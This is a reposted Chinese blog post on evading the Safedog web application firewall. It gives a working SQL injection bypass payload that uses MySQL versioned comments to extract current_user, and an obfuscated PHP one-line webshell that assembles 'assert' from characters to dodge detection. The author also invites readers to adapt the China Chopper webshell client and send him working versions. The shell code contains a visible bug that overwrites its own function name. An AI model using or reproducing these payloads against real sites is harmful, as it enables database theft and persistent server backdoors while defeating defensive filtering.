【原創】關於安全狗的注入繞過


0x01 測試狗的特性
安全狗一直我很早直前就想測試的,正好借這次機會。
本地搭建好環境
服務器:2003+apache+mysql+php+安全狗
到網上看了一下資料,了解了狗不是在進SQL進行檢測的, 就是一個正則匹配,那就不難繞了。
寫了個測試腳本,我們提交正常查詢的時候安全狗就攔截了。

網上的方法好像都不行了,狗是最新版的了,更新在8號。

 

經過一天的測試,最后總結以下是狗不攔截的。
狗只攔截了聯合select和一些常用的函數,那么OK
我們換成
/*!50000select/

  當時測試是發現能過狗但是mysql語句有錯,最后測試如下:

Mysql是執行成功,我們用狗測試。

 

這里注意一下。User() 是被攔截的,換成cueernt_user狗是不攔截的。
最后繞過:
/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

  

0x02  逃避狗的嗅覺。
關於大馬這我也就不耗費精力去測試了,我們直接上一句話。
<?php
$mysql="a"."s"."s"."e"."r"." "."t";
$mysql1=str_replace(" ","","$mysql");
$mysql1=($_POST[90sec]);
?>

  

菜刀方面就大家自行動手了,如果改出來了記得發我一份。
哪位同學有好的思路,可以自由發揮。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM